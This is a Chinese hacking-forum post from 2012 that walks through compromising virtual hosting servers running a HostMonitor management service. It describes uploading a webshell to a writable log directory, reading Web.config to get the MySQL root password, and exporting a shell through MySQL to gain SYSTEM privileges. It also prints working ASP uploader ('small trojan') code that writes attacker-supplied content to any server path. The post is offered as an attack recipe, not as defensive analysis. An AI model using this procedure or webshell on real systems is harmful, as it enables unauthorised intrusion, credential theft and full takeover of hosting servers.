设为首页收藏本站
开启辅助访问 切换到宽版
搜索
传奇GM论坛»论坛 综合交流 网络攻防 分析虚拟服务器提权全过程

分析虚拟服务器提权全过程

[复制链接]
查看1070 | 回复0 | 2012-4-1 19:25:34 | 显示全部楼层 |阅读模式
判断是否是我说的这类服务。HTTP://服务器IP/Management/
显示内容为:“ThisisPdfActivexintheActiveX,AddallintheWebPage!”
用BS的马直接浏览c:\HostMonitor\vhostlog文件夹。找个能上传的目录。上传BS的马。
之后浏览HTTP://服务器IP/vhostlog/shell.asp
然后查看c:\HostMonitor\Management\Web.config文件,得到Mysqlroot的密码。

Web.config

Web.config
连接MYSQL数据库。然后。导出小马到c:\HostMonitor\Management\文件夹下,得到system权限。

system

system
注意。这类服务器装有8SignsFirewall防火墙的。PHP。ASP。ASPX很多小马大马都不能用。所以这里指定用BS的马。
小马
<%
OnErrorResumeNext
setgl=server.CreateObJeCt("Adodb.Stream")
gl.Open
gl.Type=2
gl.CharSet="gb2312"
gl.writetextrequest("code")
gl.SaveToFileserver.mappath(request("path")),2
gl.Close
setgl=nothing
response.redirectrequest("path")
%>
aspshelluP.
服务器, system

相关帖子

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Ask
回复楼主 返回列表